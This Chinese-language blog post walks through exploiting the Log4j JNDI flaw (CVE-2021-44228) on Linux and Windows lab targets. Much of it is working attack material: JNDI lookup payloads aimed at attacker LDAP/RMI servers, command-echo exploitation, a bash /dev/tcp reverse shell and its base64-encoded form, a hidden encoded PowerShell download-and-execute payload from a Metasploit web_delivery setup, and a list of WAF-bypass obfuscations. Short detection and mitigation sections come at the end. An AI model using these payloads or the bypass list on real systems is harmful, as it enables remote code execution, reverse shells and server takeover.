CVE-2021-44228-Apache-Log4j-Rce漏洞反弹win&linux

妖狐艹你老母 2024-04-07 10:44 8阅读 0赞

#####  #####

#### 0x00 漏洞描述 ####

Apache Log4j 是 Apache 的一个开源项目，Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架，并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等，通过定义每一条日志信息的级别，能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发，用来记录日志信息。  
Log4j-2中存在JNDI注入漏洞，当程序将用户输入的数据被日志记录时，即可触发此漏洞，成功利用此漏洞可以在目标服务器上执行任意代码。鉴于此漏洞危害较大，建议客户尽快采取措施防护此漏洞

#### 0x01 影响范围 ####

Apache Log4j 2.x < 2.15.0-rc2  
已知受影响组件 1、Apache Struts2 2、Apache Solr 3、Apache Flink 4、Apache Druid 5、ElasticSearch 6、flume 7、dubbo 8、Redis 9、logstash 10、kafka

11.vmvare

12.Spring-Boot-strater-log4j2

#### 0x02 环境搭建 ####

##### 一、linux环境搭建 #####

linxu环境下目前 Vulfocus 已经集成 Log4j2，可通过以下链接启动在线环境测试： [http://vulfocus.fofa.so/\#/dashboard?image\_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c][http_vulfocus.fofa.so_dashboard_image_id_3b8f15eb-7bd9-49b2-a69e-541f89c4216c]  
也可通过 docker pull vulfocus/log4j2-rce-2021-12-09:latest 拉取本地环境运行

![68057279c8c6ca89fd635eceb723cfe1.png][]

启动dokcer环境

docker run -d -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest

![b21b14ff45f5ec5011112f0041ac74af.png][]

http://192.168.1.4:8080/

![71c5b4f42381479ba4b3134556c42396.png][]

#### 二、win 本地环境 ####

本地环境：java版本8u181，tomcat8.5.32

源码包：

链接：https://pan.baidu.com/s/1STgDdVb4QUm9r0t9wZZA-Q 提取码：uodm

![d3f7502aaa4a98ba3f8fb32cd3d465dd.png][]

ROOT.war为Tomcat启动包，删除webapps目录下的ROOT目录，将ROOT.war放入Tomcat的webapps目录下，启动Tomcat即可

![5d4cf7e5a299d44649a0ae4ee2251bec.png][]

![cb97445ec11d704b49d17b0d9930a8a5.png][]

#### 0x03 漏洞利用 ####

##### 一、linux环境下dnslog回显 #####

注意：

Content-Type: application/x-www-form-urlencoded

post:  
payload=$\{jndi:ldap://ti851c.dnslog.cn\}

![24d0041b34ca0dffa29568488db2af2d.png][]

dnslog回显：

![f3e136fd893e82b8b9c13a58909f3179.png][]

##### 二、win环境下dnslog回显 #####

注意：

Content-Type: application/x-www-form-urlencoded

post:  
payload=$\{jndi:ldap://ti851c.dnslog.cn\}

#####  #####

![7d2bf1482c41384d4504c32dfd65be62.png][]

dnslog回显：

![0993de903b9762181048a40487d949e1.png][]

##### 三、linux环境下命令回显 #####

注意Content-Type: application/x-www-form-urlencoded  
payload=$\{jndi:ldap://192.168.1.14:2222/TomcatBypass/TomcatEcho\}  
这里用到JNDIExploit-1.2-SNAPSHOT.jar工具启一个ldap服务

[https://download1320.mediafire.com/8nkrfr49l20g/dm0qgwujkwcy585/JNDIExploit.v1.2.zip][https_download1320.mediafire.com_8nkrfr49l20g_dm0qgwujkwcy585_JNDIExploit.v1.2.zip]

java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 2222 -p 8988 -i 0.0.0.0

![92c142e21e72b0ad264730d3373a107d.png][]

执行，成功回显

![9f0b9272e419adda1f9e12714021cc1f.jpeg][]

![fc61a547b4cd6449d40a58acc668e194.png][]

##### 四、win环境下命令回显 #####

#####  #####

1.注意Content-Type: application/x-www-form-urlencoded  
这里用到JNDIExploit-1.2-SNAPSHOT.jar工具启一个ldap服务

[https://download1320.mediafire.com/8nkrfr49l20g/dm0qgwujkwcy585/JNDIExploit.v1.2.zip][https_download1320.mediafire.com_8nkrfr49l20g_dm0qgwujkwcy585_JNDIExploit.v1.2.zip]

java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 2222 -p 8988 -i 0.0.0.0

![c700fe2668ae558fcf8c1f65424866a8.png][]

2.这个是输入的payload: $\{jndi:ldap://10.206.14.240:2222/Basic/TomcatEcho\} ，使用的话IP修改为自己的起JNDI服务的IP即可,将刚才的包放入repeater，执行命令，添加自定义的header，cmd:whoami来执行

![c762bf01bfac58c27bf474a03332bf3a.png][]

执行命令，并发送数据包，成功回显

![e74a06f933597fbff526cb36876feb65.png][]

#####  #####

##### 五、linux环境下反弹shell #####

1.JDK下载与安装(需要JDK1.8121 版本以下)

JDK下载地址：

[https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html][https_www.oracle.com_java_technologies_javase_javase8-archive-downloads.html]

![6ad9494eff2441029e9a282bb6ccfb33.png][]

2.攻击机上执行linux进行nc反弹监听命令  
nc -nvlp 2333  
3.生成bash反弹命令的payload

bash -i >& /dev/tcp/192.168.1.14/2333  0>&1
    4.在线网站对其payload进行编码
    https://www.jackson-t.ca/runtime-exec-payloads.html
    得到:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTQvMjMzMyAgMD4mMQ==}|{base64,-d}|{bash,-i}

5.启动一个ldap服务

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTQvMjMzMyAgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.1.14"

![7d98d9f1e0aceac6e35e4a584eaa2d85.png][]

6.发送payload(这里ldap协议不太行，换成rmi协议可以)

因为java版本高于1.8.0\_191之后，不会默认开启ldap，所以我们这里需要选择用rmi的方式来进行攻击。

注意Content-Type: application/x-www-form-urlencoded

payload=${jndi:rmi://192.168.1.14:1099/zxeiar}

![977894ba38bf2b9717bd609fac3c0e23.png][]

7.成功拿到shell

![b1ccd249f346dc6fc6b287ba24042e30.png][]

#### 六、win环境下反弹shell ####

1.kali下msf生成powershell

use exploit/multi/script/web_delivery
    set payload payload/windows/x64/powershell_reverse_tcp

set lhost 10.206.14.54
    set target 2
    run

![0f4e07cb7337bf46fe2f83d7ee71d855.png][]

![c6bcd5479948b2af6b376fab1b744cc5.png][]

2.生成的POC

powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABZAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAFkALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABZAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMgAwADYALgAxADQALgA1ADQAOgA4ADAAOAAwAC8ASABKAEYAaABTAHoASQBnAEsAOQAvAGkATgByAHIAagBiAFoAUwBYAGUAMQBQAEUARQBPACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAyADAANgAuADEANAAuADUANAA6ADgAMAA4ADAALwBIAEoARgBoAFMAegBJAGcASwA5ACcAKQApADsA

3.本地或vps启动服务

github下载JNDI-Injection-Exploit poc:

[https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0][https_github.com_welk1n_JNDI-Injection-Exploit_releases_tag_v1.0]

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABZAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAFkALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABZAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMgAwADYALgAxADQALgA1ADQAOgA4ADAAOAAwAC8ASABKAEYAaABTAHoASQBnAEsAOQAvAGkATgByAHIAagBiAFoAUwBYAGUAMQBQAEUARQBPACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAyADAANgAuADEANAAuADUANAA6ADgAMAA4ADAALwBIAEoARgBoAFMAegBJAGcASwA5ACcAKQApADsA" -A "192.168.1.7"

![d7ec1834aa957c26ef2ad52fb400a1cc.png][]

![2f671f7407d32ffe867419a55ff8b569.png][]

4.协议根据实际情况使用，这里使用rmi协议发送数据包。

$\{jndi:rmi://10.206.14.240:1099/6lwxbt\}

![3ad4319f61feccfe896766da47da4159.png][]

5.在msf中成功反弹win本地的shell.

![051fd7d99f2902ad38e8826f2c16b206.png][]

#### 0x04 判断方式 ####

只需排查Java应用是否引入 log4j-api , log4j-core 两个jar。若存在应用使用，极大可能会受到影响。

#### 0x05 漏洞排查 ####

1.代码排查：

查看 pom.xml 是否引入 org.apache.logging.log4j、org.apache.logging.log4j2

![4df0ca96729cab96a8106aff8bca0cd7.jpeg][]

2.linux下命令排查：

sudo find / -name "*log4j-*.jar"

![563ce23f086f5ca240b69af01104564f.png][]

3.Win下命令排查：

*log4j*.jar

![e0077619d4fc8157a5824c75a2734dca.jpeg][]

4. BurpLog4j2Scan被动扫描bp插件

https://github.com/tangxiaofeng7/BurpLog4j2Scan/releases/download/v1.1/BurpLog4j2Scan-1.0-SNAPSHOT.jar

![7c335e4cd53c150c0a0515cf4e2bcc45.png][]

#### 0x06 修复方式 ####

1、升级版本至log4j-2.15.0  
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2  
2、升级 jdk11.0.1，8u191，7u201，6u211 至更高版本  
紧急缓解措施  
1、修改jvm 在启动项添加参数 -Dlog4j2.formatMsgNoLookups=true  
2、将系统环境变量 FORMAT\_MESSAGES\_PATTERN\_DISABLE\_LOOKUPS 设置 为 true  
3、修改配置 log4j2.formatMsgNoLookups=True

#### 0x07 绕过技巧 ####

1.绕过rc1

${jndi:ldap://127.0.0.1:1389/ badClassName}

2.绕过WAF

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
    ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
    ${jndi:rmi://adsasd.asdasd.asdasd}
    ${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
    ${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
    ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
    ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

3. rce对jdk版本要求比较严格:rmi方式jdk 6u132 7u131 8u121以前；ldap方式jdk11.0.1 8u191 7u201 6u211以前

#### **0x08 参考文献** ####

[https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce][https_github.com_tangxiaofeng7_CVE-2021-44228-Apache-Log4j-Rce]

[https://github.com/jas502n/Log4j2-CVE-2021-44228][https_github.com_jas502n_Log4j2-CVE-2021-44228]

[https://github.com/0x727/JNDIExploit][https_github.com_0x727_JNDIExploit] [https://github.com/whwlsfb/Log4j2Scan/][https_github.com_whwlsfb_Log4j2Scan]

[https://github.com/dbgee/log4j2\_rce][https_github.com_dbgee_log4j2_rce]

[https://github.com/bkfish/Apache-Log4j-Learning][https_github.com_bkfish_Apache-Log4j-Learning]

[https://www.o2oxy.cn/3884.html][https_www.o2oxy.cn_3884.html]

[https://www.wangt.cc/2021/12/%EF%BC%88%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA%E5%A4%8D%E7%8E%B0%EF%BC%89cve-2021-44228-apache-log4j-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/][https_www.wangt.cc_2021_12_EF_BC_88_E7_8E_AF_E5_A2_83_E6_90_AD_E5_BB_BA_E5_A4_8D_E7_8E_B0_EF_BC_89cve-2021-44228-apache-log4j-_E8_BF_9C_E7_A8_8B_E4_BB_A3_E7_A0_81_E6_89_A7_E8_A1_8C_E6_BC_8F_E6_B4_9E]

[https://www.skyzyw.com/article/18855.html][https_www.skyzyw.com_article_18855.html]

[http://www.dmkxy.me/2021/12/10/Apache%20Log4j%20RCE%E6%BC%8F%E6%B4%9E/][http_www.dmkxy.me_2021_12_10_Apache_20Log4j_20RCE_E6_BC_8F_E6_B4_9E]

[https://syunaht.com/p/2341403076.html][https_syunaht.com_p_2341403076.html]

[http_vulfocus.fofa.so_dashboard_image_id_3b8f15eb-7bd9-49b2-a69e-541f89c4216c]: http://vulfocus.fofa.so/#/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c
[68057279c8c6ca89fd635eceb723cfe1.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/0690d7211b0343ab9229f5634daf654b.png
[b21b14ff45f5ec5011112f0041ac74af.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/fa773834da254ed49e205403bfc227d3.png
[71c5b4f42381479ba4b3134556c42396.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/38fb41a3ba544101827b58d50167cd94.png
[d3f7502aaa4a98ba3f8fb32cd3d465dd.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/87a6c1e135704121a6ec9b9b90aeff84.png
[5d4cf7e5a299d44649a0ae4ee2251bec.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/5c41aeb793a64db4820497ddd5514ce3.png
[cb97445ec11d704b49d17b0d9930a8a5.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/52c4936d1dd74b41b7fe0777893e8c75.png
[24d0041b34ca0dffa29568488db2af2d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/28edce6e185d485d9e6d4064b72be017.png
[f3e136fd893e82b8b9c13a58909f3179.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/35ca88eb682c460c9b3ea9e437fd92f8.png
[7d2bf1482c41384d4504c32dfd65be62.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/710393e53c1042aa8c1c64828be730ae.png
[0993de903b9762181048a40487d949e1.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/c44dd408d66f47f2af82ffc6748804d3.png
[https_download1320.mediafire.com_8nkrfr49l20g_dm0qgwujkwcy585_JNDIExploit.v1.2.zip]: https://download1320.mediafire.com/8nkrfr49l20g/dm0qgwujkwcy585/JNDIExploit.v1.2.zip
[92c142e21e72b0ad264730d3373a107d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/f4ad17224b0a4f19b8b0ffefb7bf2eb0.png
[9f0b9272e419adda1f9e12714021cc1f.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/923c8ef7e69943879f9db832df7ccc74.jpeg
[fc61a547b4cd6449d40a58acc668e194.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/752518f7ff854a4babef994bf829cc3f.png
[c700fe2668ae558fcf8c1f65424866a8.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/8367880be24349dea6d56904a246efbd.png
[c762bf01bfac58c27bf474a03332bf3a.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/bbc6d81998284eb0b7d0ec1b0b4c11f9.png
[e74a06f933597fbff526cb36876feb65.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/a3cba79adc2843ac95d2ebcde34f8bab.png
[https_www.oracle.com_java_technologies_javase_javase8-archive-downloads.html]: https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html
[6ad9494eff2441029e9a282bb6ccfb33.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/19c7d075411a439ba1d736b760198be7.png
[7d98d9f1e0aceac6e35e4a584eaa2d85.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/f47cc015117f4c20b197c54d9b56003a.png
[977894ba38bf2b9717bd609fac3c0e23.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/4dc53265bf444834bae9b551fb2a329b.png
[b1ccd249f346dc6fc6b287ba24042e30.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/6caa14d5af784a418983314b0173bf0b.png
[0f4e07cb7337bf46fe2f83d7ee71d855.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/52885815b3c54d6c80295ce472bf1d88.png
[c6bcd5479948b2af6b376fab1b744cc5.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/dd7d3d675b5c42f5b864937375d908db.png
[https_github.com_welk1n_JNDI-Injection-Exploit_releases_tag_v1.0]: https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
[d7ec1834aa957c26ef2ad52fb400a1cc.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/8cb25e8c486d4aea8c467e7cc7ea29a1.png
[2f671f7407d32ffe867419a55ff8b569.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/60250b5ab3da4a0685aa93c3dbed868f.png
[3ad4319f61feccfe896766da47da4159.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/53d205a217a84171abdadb33309ba918.png
[051fd7d99f2902ad38e8826f2c16b206.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/6fc032d59ece477294c9b0e3ca68fb38.png
[4df0ca96729cab96a8106aff8bca0cd7.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/556b7a5af53343f99ee26cd7ba77323c.jpeg
[563ce23f086f5ca240b69af01104564f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/e476bb1e50ec42ce833a4beaab4eee63.png
[e0077619d4fc8157a5824c75a2734dca.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/c47bc481211e44cfab077fa2d8dda7d4.jpeg
[7c335e4cd53c150c0a0515cf4e2bcc45.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/3f695c258b804d02b5b1db1afff615cf.png
[https_github.com_tangxiaofeng7_CVE-2021-44228-Apache-Log4j-Rce]: https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
[https_github.com_jas502n_Log4j2-CVE-2021-44228]: https://github.com/jas502n/Log4j2-CVE-2021-44228
[https_github.com_0x727_JNDIExploit]: https://github.com/0x727/JNDIExploit
[https_github.com_whwlsfb_Log4j2Scan]: https://github.com/whwlsfb/Log4j2Scan/
[https_github.com_dbgee_log4j2_rce]: https://github.com/dbgee/log4j2_rce
[https_github.com_bkfish_Apache-Log4j-Learning]: https://github.com/bkfish/Apache-Log4j-Learning
[https_www.o2oxy.cn_3884.html]: https://www.o2oxy.cn/3884.html
[https_www.wangt.cc_2021_12_EF_BC_88_E7_8E_AF_E5_A2_83_E6_90_AD_E5_BB_BA_E5_A4_8D_E7_8E_B0_EF_BC_89cve-2021-44228-apache-log4j-_E8_BF_9C_E7_A8_8B_E4_BB_A3_E7_A0_81_E6_89_A7_E8_A1_8C_E6_BC_8F_E6_B4_9E]: https://www.wangt.cc/2021/12/%EF%BC%88%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA%E5%A4%8D%E7%8E%B0%EF%BC%89cve-2021-44228-apache-log4j-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
[https_www.skyzyw.com_article_18855.html]: https://www.skyzyw.com/article/18855.html
[http_www.dmkxy.me_2021_12_10_Apache_20Log4j_20RCE_E6_BC_8F_E6_B4_9E]: http://www.dmkxy.me/2021/12/10/Apache%20Log4j%20RCE%E6%BC%8F%E6%B4%9E/
[https_syunaht.com_p_2341403076.html]: https://syunaht.com/p/2341403076.html